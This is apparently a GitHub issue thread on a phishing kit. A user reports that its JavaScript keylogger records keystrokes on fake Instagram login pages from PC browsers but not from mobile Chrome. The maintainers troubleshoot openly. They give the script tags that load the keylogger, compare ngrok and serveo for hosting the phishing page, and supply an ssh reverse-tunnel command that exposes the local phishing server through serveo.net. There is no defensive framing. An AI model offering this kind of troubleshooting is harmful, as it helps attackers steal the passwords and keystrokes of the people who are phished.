Key logger does not work when site is accessed from mobile browsers
@0verd0se Which site are you talking about?
@0verd0se Did you include the following lines in code?
<script src="keylogger.js"></script>
<script src="keylogger.php"></script>
@usama7628674 Instagram one it works perfect when accessed on PC but when I open the link from my mobile browser no keystrokes are recorded except the id pass .
and I guess keylogger is not a good idea as ngrok limits connections on free hosting and if I spam my keyboard and then type my id and password I don't get redirected I get an error page on ngrok saying I exceeded my connections
@0verd0se yes it's limit of ngrok for free version but you can use serveo.
@usama7628674 Yeah I tried serveo but the link wasn't generated even after 5 mins I guess there's some issue which is still open for serveo
@0verd0se Make sure your internet connection is stable cuz it's working fine on my side.
@usama7628674 Let me try again i just tried it once though
@usama7628674 Does serveo creates a file like ngrok in Server folder? I tried multiple times but the link is not being created and there is no file for serveo like ngrok --- ( Using Termux )
It'll create link.url in main directory.
Yeah i got it the link.url file is blank even after waiting 5 mins, no error shown
Did you clone master branch?
Run the following command on terminal and see if that helps
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net
@usama7628674 Serveo works now perfectly. But the bug remains no key logged when used on chrome browser on mobile works perfectly on PC browser.
I'll look into it later.Currently busy studying.
@0verd0se The keylogger works using javascript codes , As I have tested in mobile chrome, That keylogger file of java script was not loading. So currently its not recording the keystrokes for Android chrome, Because chrome Don't allow to background javascript as it thought, So wait sometime ,whenever i got time, I'll search for its solution. And if you want you use the tool then you can use it without keylogger , KEYLOGGER IS CURRENTLY IN TESTING STAGE...
@An0nUD4Y No issues, i just wanted to inform that its not working :D
@0verd0se Thanks to inform !! You can Help, By making some contribution.?
Most helpful comment
I'll look into it later.Currently busy studying.